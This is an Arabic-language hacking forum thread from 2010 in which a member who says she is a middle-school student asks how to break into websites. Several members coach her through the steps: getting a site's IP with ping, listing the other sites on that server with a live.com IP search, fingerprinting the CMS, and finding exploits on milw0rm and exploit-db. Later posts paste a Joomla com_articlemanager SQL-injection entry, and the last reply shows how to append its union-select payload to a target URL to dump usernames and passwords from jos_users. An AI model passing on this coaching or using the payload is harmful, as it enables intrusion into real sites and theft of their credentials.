التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 01-15-2010, 02:23 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
ღ}~ ملكة الهاكر ريماس ~{ღ

][ اسيرة الانتقام ][

 
الصورة الرمزية ღ}~ ملكة الهاكر ريماس ~{ღ
 

 

 
إحصائية العضو








ღ}~ ملكة الهاكر ريماس ~{ღ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ღ}~ ملكة الهاكر ريماس ~{ღ is on a distinguished road

افتراضي غير مجاب: آرجو دخول محترفي ومبدعي [هـآكر الموآآقع] جعل آيديكم مآتمسآه النآر


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته ,,

تحية طيبة لكل آعضآء وآدآرة آلمنتدىآ آلمميز وآلرآئع ~

آخوآني محترفي آلهكر
آسعد آلله آوقآتكم وبآرك في حيآتكم وآرزآقكم ,,

طلب وآقسم بآلله لن آنسى من سيقدم لي هآذآ آلمعروف
وآني سإدعي له في كل سجدة

خطوآت آخترآق الموآقع
رؤؤس آقلآم مو شرح بآلتفصيل يعني آلفكرة ع آيش تعتمد ؟؟ .. !! ..

سؤال آخر ,,
بعد آلذهآب آلى آلدوس وكتآبة آلآمر Cmd ثم Ping ورآبط آلموقع آو آلمنتدىآ
سيظهر آيبي آلسيرفر آلذي يتوآجد عليه هذآ آلموقع آذآ ً الآن حروح لمحرك بحث Live.com وحكتب آلآيبي
بعد كتآبته حتطلع كل آلموآآآآآآآآآآآقع آلي ع هآلسيرفر تمآم الآن حطلع السكربت الي مركبه آحد هؤلآء آلموآقع
حكتب بعد آلآيبي Powered by
طيب بعد هآلخطوة آيش آعمل ؟؟ .. !! ..
آعرف آنو بعد مآ آعرف آلسكربت حروح لموووووووووووووقع آلميلآرووووم وحكتب آلسكربت آلي مركبه آحد هؤلآء الموآآآآآآقع

بعدهآ آيش آعمل ؟؟ .. !! ..

آلله يحرم آلنآر عليكم وآسئل آلله آن يجعل بسمتكم عآدة وحديثكم عبآدة وخآتمتكم شهآدة ورزقكم في زيآدة
وحيآتكم سعآدة وآن يدخلكم برضىآ منه آعلىآ جنة ويحقق لكم كل مآ تتمنىآ

آمين يآرب العآلمين ,,

آختكم



Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC Nv[, ]o,g lpjvtd ,lf]ud FiJN;v hgl,NNruD [ug Nd]d;l lNjlsNi hgkNv


التعديل الأخير تم بواسطة ღ}~ ملكة الهاكر ريماس ~{ღ ; 02-28-2010 الساعة 02:08 PM.

   

رد مع اقتباس
قديم 01-15-2010, 04:29 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

................


وعليكم السلام ورحمة الله وبركاته





اخي طريقتك صحيحه لما تدخل على موقع الميلورم أبحث عن

ثغرات للسكربت تبع الموقع وبعدها شوف اثغرة بأي لغه

وترجمها لكي تخترق بها ..




انا لسى مبتدئ في هذا المجال وأن شاء الله أحترف فيه




ونسيت أن اخبرك ياغالي [ أذا تبي تبحث عن ثغرات أبحث في

الموقع الجديد والاصلي وهذا هو .:

www.exploit-db.com

وهذا الموقع البديل [ لان موقع المييلورم

www.milw0rm.com متعطل له أربع شهور ]




والموقع البديل أصبح جميل وفيه ثغرات جديدهـ ويسمونه

[ نسخة الميلورم ] لان أكثر الثغرات الي بـ موقع الميلورم

نقلوها ألى الموقع البديل



ونسيت ان أخبرك أيضأأ [ لاتبحث فقط عن السكربت أبحث

ثغرات عن نظام الموقع مثل [ اللنكسس ، والويندوز ]



وأفحص الموقع وأبحث عن ثغرات [ الاباتشي ، والويندوز ]

الاباتشي صعبه شوي لانها من مبرمجين مشهورين ويبيلها

شويه عقل



أما الويندوز سهل اختراقاها لانها [ من صنع شركه ماكروسفت ]



واذا لم تجد ثغرات في الموقع المراد أختراقه [ أبحث عن

المواقع الثانيه التي على السيرفر ويمكنك أستخراج

المواقع التي على السيرفر كامل عن طريق الاي بي تبع الموقع

المستهدف ]




وأن شاء الله تكون قد [ أخترقت اكثر من موقع ]




بالتوفيق يابطل


التعديل الأخير تم بواسطة Dr.NaNo ; 01-15-2010 الساعة 04:39 AM.

   

رد مع اقتباس
قديم 01-15-2010, 02:39 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
ღ}~ ملكة الهاكر ريماس ~{ღ

][ اسيرة الانتقام ][

 
الصورة الرمزية ღ}~ ملكة الهاكر ريماس ~{ღ
 

 

 
إحصائية العضو








ღ}~ ملكة الهاكر ريماس ~{ღ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ღ}~ ملكة الهاكر ريماس ~{ღ is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Dr.NaNo
وعليكم السلام ورحمة الله وبركاته





اخي طريقتك صحيحه لما تدخل على موقع الميلورم أبحث عن

ثغرات للسكربت تبع الموقع وبعدها شوف اثغرة بأي لغه

وترجمها لكي تخترق بها ..




انا لسى مبتدئ في هذا المجال وأن شاء الله أحترف فيه




ونسيت أن اخبرك ياغالي [ أذا تبي تبحث عن ثغرات أبحث في

الموقع الجديد والاصلي وهذا هو .:

www.exploit-db.com

وهذا الموقع البديل [ لان موقع المييلورم

www.milw0rm.com متعطل له أربع شهور ]




والموقع البديل أصبح جميل وفيه ثغرات جديدهـ ويسمونه

[ نسخة الميلورم ] لان أكثر الثغرات الي بـ موقع الميلورم

نقلوها ألى الموقع البديل



ونسيت ان أخبرك أيضأأ [ لاتبحث فقط عن السكربت أبحث

ثغرات عن نظام الموقع مثل [ اللنكسس ، والويندوز ]



وأفحص الموقع وأبحث عن ثغرات [ الاباتشي ، والويندوز ]

الاباتشي صعبه شوي لانها من مبرمجين مشهورين ويبيلها

شويه عقل



أما الويندوز سهل اختراقاها لانها [ من صنع شركه ماكروسفت ]



واذا لم تجد ثغرات في الموقع المراد أختراقه [ أبحث عن

المواقع الثانيه التي على السيرفر ويمكنك أستخراج

المواقع التي على السيرفر كامل عن طريق الاي بي تبع الموقع

المستهدف ]




وأن شاء الله تكون قد [ أخترقت اكثر من موقع ]




بالتوفيق يابطل



يعطيك آلف عآفيه يآرب
وجزآك ربي آلجنة ويحقق لك كل مآتتمنىآ
يسعدك ربي يآرب

بس ملآحظة صغيرة بآلمرة
آخوي آنآ بنت مو ولد
بعضكم بل آكثركم يظن آن آلي بيتعلمو للهكر شبآب !!

لآ هذآ كلآم غير صحيح يشهد ربي علي في كل موآقع آلهكر آلي سجلت فيهآ
بآسمي آلحقيقي وآني بنت وحآبه آدخل للعلم آلهكرز وآبحر في ذآك العآلم آلجميل

وعندي كم سؤآل ممكن :-

كيف آعرف نظآم تشغيل آلسيرفر ؟؟ اللنكس ويندوز آلخ
ولمآ آدخل ع موقع الميلآروم وآخترت ثغرة بآيش آترجمهآ ؟؟ وكيف ومن وين ؟؟
صحيح معك حق آلمنتدىآ آلي حآبه آخترقه مآموجود فيه ثغرآت
لكن في موآقع ع نفس آلسيرفر آلي بيتوآجد عليه هذآ منتدىآ آلي حآبه آخترقه فيهآ ثغرآت

شآكره لك كثير ,,
جزآك ربي آلجنة

آختك

التعديل الأخير تم بواسطة ღ}~ ملكة الهاكر ريماس ~{ღ ; 01-15-2010 الساعة 02:43 PM.

   

رد مع اقتباس
قديم 01-15-2010, 04:26 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
ღ}~ ملكة الهاكر ريماس ~{ღ

][ اسيرة الانتقام ][

 
الصورة الرمزية ღ}~ ملكة الهاكر ريماس ~{ღ
 

 

 
إحصائية العضو








ღ}~ ملكة الهاكر ريماس ~{ღ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ღ}~ ملكة الهاكر ريماس ~{ღ is on a distinguished road

افتراضي


آآآآآآآآآرجو آآآآآآلرد

   

رد مع اقتباس
قديم 01-15-2010, 05:26 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


ممممممممممممممممم

من نقطه بنبدا المشواااااااار

اول شيء بنت ولا ولد مش مشكله بس لكن البعض متعود يتكلم للشباب بدون انتباه
(عادي في كثير بنات هكر )

النقطه الثانيه

الاستهداف يعد من اعقد الامور

وانا بدون اي مشكله بقول لك اني

استهدفت كثير سيرفرات
لكن حتى الان ما طلعت براس مع اي سيرفر منهم

يعني انا بالرغم من كل يلي بعرفه لسا ما عندي امكانيات اني اجيب سيرفر مستهدفه
:(

الاستهداف بيجي بعد احتراف معظم انواع الثغرات


والسبب

لنفرض انك عند دخولك موقع ميلورم

وجدتي ثغره باحد السكربتات
لكن انتي ما بتعرف ايش نوع الثغره
لنفرض انك عرفتيه

ما بتعرف استغلاله

يعني الشغله مش بيوم وليله
بتصير بدها تعلم كثير


انصحك شيء

لاحتراف الاختراق
(الاختراق هو قمه احتراف البرمجه )
لانك تجد اخطاء لا ينتبه لها غيرك من المبرمجين

ولذا انصحكي بتعلم البرمجه وخاصه php + mysql +asp +perl
واسمبلي في الحالات المتقدمه

كذا ما ضل نقول لكي غير بعد ما نحترف البرمجه
بنحمل حالنا بنتعلم كيف استغلال الثغرات
عندك دوره sql
+
دوره استغلال الثغرات
بتتعلميهم وبتتقنيهم وبعد كذا
بمسك نفسنا وبنحاول نخترق

انا شخصيا لما احاول اخترق سيرفر
ابدا بثغره
sql
لاني متقنها
وبعدها بنزل ميلورم اشوف ثغرات السكربتات

طيب ما لقيت بميلورم


(اذا كان الشيء مهم جدا )

بمسك مواقع السيرفر موقع موقع
وابلش فيها فحص ثغرات ولو اتضر احمل السكربت لجهازي وافحصه بجهازي
(طبعا عمري ما عملتها اذا ما زبط السيرفر بقله الله معاك )


اتمنا اني افدتك ولو بالقليل

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 01-15-2010, 05:36 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
ღ}~ ملكة الهاكر ريماس ~{ღ

][ اسيرة الانتقام ][

 
الصورة الرمزية ღ}~ ملكة الهاكر ريماس ~{ღ
 

 

 
إحصائية العضو








ღ}~ ملكة الهاكر ريماس ~{ღ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ღ}~ ملكة الهاكر ريماس ~{ღ is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة VoLc4n0
ممممممممممممممممم

من نقطه بنبدا المشواااااااار

اول شيء بنت ولا ولد مش مشكله بس لكن البعض متعود يتكلم للشباب بدون انتباه
(عادي في كثير بنات هكر )

النقطه الثانيه

الاستهداف يعد من اعقد الامور

وانا بدون اي مشكله بقول لك اني

استهدفت كثير سيرفرات
لكن حتى الان ما طلعت براس مع اي سيرفر منهم

يعني انا بالرغم من كل يلي بعرفه لسا ما عندي امكانيات اني اجيب سيرفر مستهدفه
:(

الاستهداف بيجي بعد احتراف معظم انواع الثغرات


والسبب

لنفرض انك عند دخولك موقع ميلورم

وجدتي ثغره باحد السكربتات
لكن انتي ما بتعرف ايش نوع الثغره
لنفرض انك عرفتيه

ما بتعرف استغلاله

يعني الشغله مش بيوم وليله
بتصير بدها تعلم كثير


انصحك شيء

لاحتراف الاختراق
(الاختراق هو قمه احتراف البرمجه )
لانك تجد اخطاء لا ينتبه لها غيرك من المبرمجين

ولذا انصحكي بتعلم البرمجه وخاصه php + mysql +asp +perl
واسمبلي في الحالات المتقدمه

كذا ما ضل نقول لكي غير بعد ما نحترف البرمجه
بنحمل حالنا بنتعلم كيف استغلال الثغرات
عندك دوره sql
+
دوره استغلال الثغرات
بتتعلميهم وبتتقنيهم وبعد كذا
بمسك نفسنا وبنحاول نخترق

انا شخصيا لما احاول اخترق سيرفر
ابدا بثغره
sql
لاني متقنها
وبعدها بنزل ميلورم اشوف ثغرات السكربتات

طيب ما لقيت بميلورم


(اذا كان الشيء مهم جدا )

بمسك مواقع السيرفر موقع موقع
وابلش فيها فحص ثغرات ولو اتضر احمل السكربت لجهازي وافحصه بجهازي
(طبعا عمري ما عملتها اذا ما زبط السيرفر بقله الله معاك )


اتمنا اني افدتك ولو بالقليل



جعل آيديك مآتمسآه النآر
وآسئل المولىآ آن يدخلك برضىآ منه آعلى جنة ويحقق لك كل مآتتمنىآ

آختك

التعديل الأخير تم بواسطة ღ}~ ملكة الهاكر ريماس ~{ღ ; 02-28-2010 الساعة 02:10 PM.

   

رد مع اقتباس
قديم 01-15-2010, 11:36 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو





HaCkEr-By-MaROcO غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
HaCkEr-By-MaROcO is on a distinguished road

افتراضي


السلام عليكم

اختي عندمى تلقي سركيبت لاي مركب عليه الموقع ادهبي الى
www.milw0rm.com

واكتبي اسم السكريبت وراح يعطيك الاستغلال الكامل

بتوفيق

التوقيع

 

   

رد مع اقتباس
قديم 01-15-2010, 11:57 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
ღ}~ ملكة الهاكر ريماس ~{ღ

][ اسيرة الانتقام ][

 
الصورة الرمزية ღ}~ ملكة الهاكر ريماس ~{ღ
 

 

 
إحصائية العضو








ღ}~ ملكة الهاكر ريماس ~{ღ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ღ}~ ملكة الهاكر ريماس ~{ღ is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة HaCkEr-By-MaROcO
السلام عليكم

اختي عندمى تلقي سركيبت لاي مركب عليه الموقع ادهبي الى
www.milw0rm.com

واكتبي اسم السكريبت وراح يعطيك الاستغلال الكامل

بتوفيق

صحيح معك حق تطلع لي بس كيف آعرف آيش آلمقصود آترجمهآ ؟؟ كيف ؟؟ ومن وين ؟؟

يآليت يآ آخوي تشرح آكثر

وآسئل آلله آلكريم آلرحيم آن يدخلك جنآت النعيم ويجعلك حآفظآ للقرآن آلكريم
جعل يديك مآتمسآه آلنآر يآرب

آدعو آلله آن يدخلك آلجنة وبرضىآ منه يحقق لك كل مآتتمنىآ
ويسعدك ويوفقك ويجزآك كل خير

آحلى تقيم ليك وتستآهل آكثر
دعوآت ٍ لك لن تنقطع ..

سلمت آيدك

آختك

   

رد مع اقتباس
قديم 01-16-2010, 12:17 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
إحصائية العضو





HaCkEr-By-MaROcO غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
HaCkEr-By-MaROcO is on a distinguished road

افتراضي


اختي نفترض انك لقيتي تغرة في www.milw0rm.com راح تلقى مكتوب exploit

يعني اسغلال الكامل الان ادحبي الى الموقع واكتبو الاستغلال وراء الموقع ادا اكن مصاب راح يضهر لك الباسورد مشفر و يوزر

وانا انصحك تتعلمي تغرة sql لانهى سهل وهناك دورة في المنتدى صوت وصورة

اتنمنى اكون افدتك

بتوفيق

التوقيع

 

   

رد مع اقتباس
قديم 01-16-2010, 12:42 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية Cyber Code
 

 

 
إحصائية العضو








Cyber Code غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Cyber Code is on a distinguished road

افتراضي


اختي الكرـيمة لاختراق موقع معـين

اول شيء بتطلعي الايبي تبعه وذالك عبر

Start>RUN>Cmd

ping www.xxx.com

حلو بعـد ماتطلعي الاّيبي معاكي طريقتين

الأولى : تشوفي الموقع وش من سكربتات مركبها ,, وافحصي ثغراته , اذا طلعتي ثغره استغليها واخترقي الموقع , وكمان اذا لقيتي اي سكربت روحي شوفي جميع المعلومات الي تقدري تطليعها من السكربت مثلا الاصدار الاسم

تروحي ع الميل ورم وتدخلي ع Search واكتبي اسم السكربت مثلا Joomla v 2.0 اوـكي بيطلع لك ثغراات كثير اختاري احدث وحده واستغليها , واخترقي الموقع

الطرـيقه الثانيه روحي ع live.com واكتبي : ip:xxxxxx

xxxx = ايبي السرفر الي طلعتيه من الدوز

بيطلع لك كل المواقع الي ع السرفر الان ممكن تبحثي ع موقع موقع ع السريع حتى تلقي واحد مصاب بسكربت فيه ثغرة

استغليها وادعسي الموقع

طـبعا بتحتاجي تتعلمي الثغرات وانواعها واستغلالاتها , وكمان لغة ال perl + php + SqL + html هذي اللغات لو اتعلمتيها بتحترفي اختراق المواقع اسرع ,

وطريقة معرفة انه النضام : windows or linux بتعرفي بعد رفع الشل

روحي ع دورة فولكاانو للحقن وركزي فيها كثير بتخترقي مواقع كثيير وكمان اجنبيه وممخلة في الاسلام ال SQL اكثر ثغره مشهوره

وان شاء الله مع الوقت بتحترفي

سلاام

اخوك Dark Light

التوقيع

if i gain something from being a hacker
it would be a background of almost every beautiful dream

and if you asked me what did you gain from being a member here

i'll honestly answer , it's a brothers for life


سبحان الله العظيم , سبحان الله وبحمده
استغفر الله العلي العظيم وأتوب إليه

 

   

رد مع اقتباس
قديم 01-16-2010, 12:46 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية Cyber Code
 

 

 
إحصائية العضو








Cyber Code غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Cyber Code is on a distinguished road

افتراضي


وللنسبه للترجمه

طبعا كل ثغره ولها استغلالها عشان كذاا انصحك تتعلمي لغات البرمجه الي ذكرتها فوق لانها بتنفع كثير

واذا تابعتي دورة فولكانو بتتعلمي كيف تستغلي ثغرات ال SQL

وفي ثغرات مكتوبة في لغات ال Perl >> شفتي كيف تنفع اللغه هذي

ومن ال php بتتعلمي تطلعي الثغرات من السكربتات وحتى برمجة سكربتات
واشياء اكثر

اذا في اختراق المواقع ركزي اكثير شيء ع حاجتين فقط

اولا : لغات البرمجه

ثانيا : الثغرات

التوقيع

if i gain something from being a hacker
it would be a background of almost every beautiful dream

and if you asked me what did you gain from being a member here

i'll honestly answer , it's a brothers for life


سبحان الله العظيم , سبحان الله وبحمده
استغفر الله العلي العظيم وأتوب إليه

 

   

رد مع اقتباس
قديم 01-16-2010, 12:49 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
ღ}~ ملكة الهاكر ريماس ~{ღ

][ اسيرة الانتقام ][

 
الصورة الرمزية ღ}~ ملكة الهاكر ريماس ~{ღ
 

 

 
إحصائية العضو








ღ}~ ملكة الهاكر ريماس ~{ღ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ღ}~ ملكة الهاكر ريماس ~{ღ is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة HaCkEr-By-MaROcO
اختي نفترض انك لقيتي تغرة في www.milw0rm.com راح تلقى مكتوب exploit

يعني اسغلال الكامل الان ادحبي الى الموقع واكتبو الاستغلال وراء الموقع ادا اكن مصاب راح يضهر لك الباسورد مشفر و يوزر

وانا انصحك تتعلمي تغرة sql لانهى سهل وهناك دورة في المنتدى صوت وصورة

اتنمنى اكون افدتك

بتوفيق


جعل ايديك ماتمساه النار يارب والله يحقق مبتغاك ويسعدك دوم ويجزاك كل خير

عملت كل الي قلت عليه

وطلع لي موقع بعد كتابة ايبي السيرفر وكتابة Powered by Joomla

Joomla كتبتها في موقع البحث عن الثغرات البديل عن الميلاروم

اخترتها وطلعت لي

# Title: Joomla Component com_articlemanager SQL Injection Vulnerability
# EDB-ID: 11140
# CVE-ID: ()
# OSVDB-ID: ()
# Author: FL0RiX
# Published: 2010-01-14
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
################################################## ######################
# Joomla Component com_articlemanager SQL Injection Vulnerability
################################################## ######################
# Author :FL0RiX
#
# Name : com_articlemanager
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://[server]/index.php?option=com...display&artid=
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
################################################## ######################

ايش الي انسخه والصقه خلف رابط الموقع
الي لما كتبت في محرك live.com الايبي والبورد بي طلعت لي joomla

ارجوكم ساعدوني

اختكم

   

رد مع اقتباس
قديم 01-16-2010, 12:53 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
ღ}~ ملكة الهاكر ريماس ~{ღ

][ اسيرة الانتقام ][

 
الصورة الرمزية ღ}~ ملكة الهاكر ريماس ~{ღ
 

 

 
إحصائية العضو








ღ}~ ملكة الهاكر ريماس ~{ღ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ღ}~ ملكة الهاكر ريماس ~{ღ is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Dark Light
اختي الكرـيمة لاختراق موقع معـين

اول شيء بتطلعي الايبي تبعه وذالك عبر

Start>RUN>Cmd

ping www.xxx.com

حلو بعـد ماتطلعي الاّيبي معاكي طريقتين

الأولى : تشوفي الموقع وش من سكربتات مركبها ,, وافحصي ثغراته , اذا طلعتي ثغره استغليها واخترقي الموقع , وكمان اذا لقيتي اي سكربت روحي شوفي جميع المعلومات الي تقدري تطليعها من السكربت مثلا الاصدار الاسم

تروحي ع الميل ورم وتدخلي ع Search واكتبي اسم السكربت مثلا Joomla v 2.0 اوـكي بيطلع لك ثغراات كثير اختاري احدث وحده واستغليها , واخترقي الموقع

الطرـيقه الثانيه روحي ع live.com واكتبي : ip:xxxxxx

xxxx = ايبي السرفر الي طلعتيه من الدوز

بيطلع لك كل المواقع الي ع السرفر الان ممكن تبحثي ع موقع موقع ع السريع حتى تلقي واحد مصاب بسكربت فيه ثغرة

استغليها وادعسي الموقع

طـبعا بتحتاجي تتعلمي الثغرات وانواعها واستغلالاتها , وكمان لغة ال perl + php + SqL + html هذي اللغات لو اتعلمتيها بتحترفي اختراق المواقع اسرع ,

وطريقة معرفة انه النضام : windows or linux بتعرفي بعد رفع الشل

روحي ع دورة فولكاانو للحقن وركزي فيها كثير بتخترقي مواقع كثيير وكمان اجنبيه وممخلة في الاسلام ال SQL اكثر ثغره مشهوره

وان شاء الله مع الوقت بتحترفي

سلاام

اخوك Dark Light


انا ما اقول الا
الله يعطيك الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف عاااااااااااااااافيه

وحينما يظهر للأبداع عنوان ويظهر الأنسان
جماله وروعته في ردوده

يجب علي آن آقدم شكري له ودعائي لك لن ينقطع

وفقك الله ورعاك وحقق مبتغاك والله يسعدك ويسدد خطاك
ويحرم النار عليك يارب

اعجز عن شكرك يا اخي

اختك

   

رد مع اقتباس
قديم 01-16-2010, 01:10 AM   رقم المشاركة : 14 (permalink)
معلومات العضو
ღ}~ ملكة الهاكر ريماس ~{ღ

][ اسيرة الانتقام ][

 
الصورة الرمزية ღ}~ ملكة الهاكر ريماس ~{ღ
 

 

 
إحصائية العضو








ღ}~ ملكة الهاكر ريماس ~{ღ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ღ}~ ملكة الهاكر ريماس ~{ღ is on a distinguished road

افتراضي


آخوآني الله يسعدكم ردوا علي وربي ماكذبت عليكم

حروح انام بس لما اشوف ردودكم لأن عندي دوام والله انا بدرس ثالث متوسط

الله يسعدكم ردوا علي خطواتي صح والله لا

بعدما كتابة ايبي السيرفر وكتابة Powered by Joomla
في محرك بحث live.com

نسخة
Joomla وكتبتها في موقع البحث عن الثغرات البديل عن الميلاروم

اخترتها وطلعت لي

# Title: Joomla Component com_articlemanager SQL Injection Vulnerability
# EDB-ID: 11140
# CVE-ID: ()
# OSVDB-ID: ()
# Author: FL0RiX
# Published: 2010-01-14
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
################################################## ######################
# Joomla Component com_articlemanager SQL Injection Vulnerability
################################################## ######################
# Author :FL0RiX
#
# Name : com_articlemanager
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://[server]/index.php?option...display&artid=
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
################################################## ######################

ايش الي انسخه والصقه خلف رابط الموقع
الي لما كتبت في محرك live.com الايبي والبورد بي طلعت لي joomla

فياريت تخبروني الله يجزاااااكم كل خييييييييييير

   

رد مع اقتباس
قديم 01-16-2010, 02:08 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية Cyber Code
 

 

 
إحصائية العضو








Cyber Code غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Cyber Code is on a distinguished road

افتراضي


يقلك ان السكربت مصاب , بثغرة نوع الثغرة "SQL"

مثال ع الثغرة

http://[server]/index.php?option...display&artid=

Server = اكتبي الموقع المصاب وسوي مثل الرابط الي فوق

الاستغلال
null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users

بيـكون :
http://www.server.com/index.php?opti...splay&artid=-2 union select 1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8 +from+jos_users

عدد الاعمدة = 8 العمود المصاب = رقم 4

concat(username,0x3a,password)fl0rix أمر يطلع لك باسورد ويوزر القاعدة

ان شاء الله يكون مفهوم ع العموم قلت لك تابعي دورة فولكانو وكلها مرفوعه ع اليوتيوب بتوصلك لاحتراف الحقن ان شاء الله

التوقيع

if i gain something from being a hacker
it would be a background of almost every beautiful dream

and if you asked me what did you gain from being a member here

i'll honestly answer , it's a brothers for life


سبحان الله العظيم , سبحان الله وبحمده
استغفر الله العلي العظيم وأتوب إليه

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[Style] : ستايل منتدى شبكة قطر الرسمية بين أيديكم وهو من تصميم AboNawaf support قسم ستآيلات الـ vB 3 09-13-2011 03:03 AM
بين أيديكم إسطوانة إختراق الاجهزة مفيدة لكل مبتدىء cisco_security قســم إختــراق الأجهــزة 133 05-19-2011 02:27 PM
أقوى دورة لاحتراف اختراق الاجهزة بين أيديكم ^ على ضمانتي :) DannY.IraQi قســم إختــراق الأجهــزة 4 07-11-2010 10:56 AM
مساعده من محترفى SQL hatmoot جـــ'ابات العناكــ'ب 8 02-13-2010 04:09 AM


الساعة الآن 04:14 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0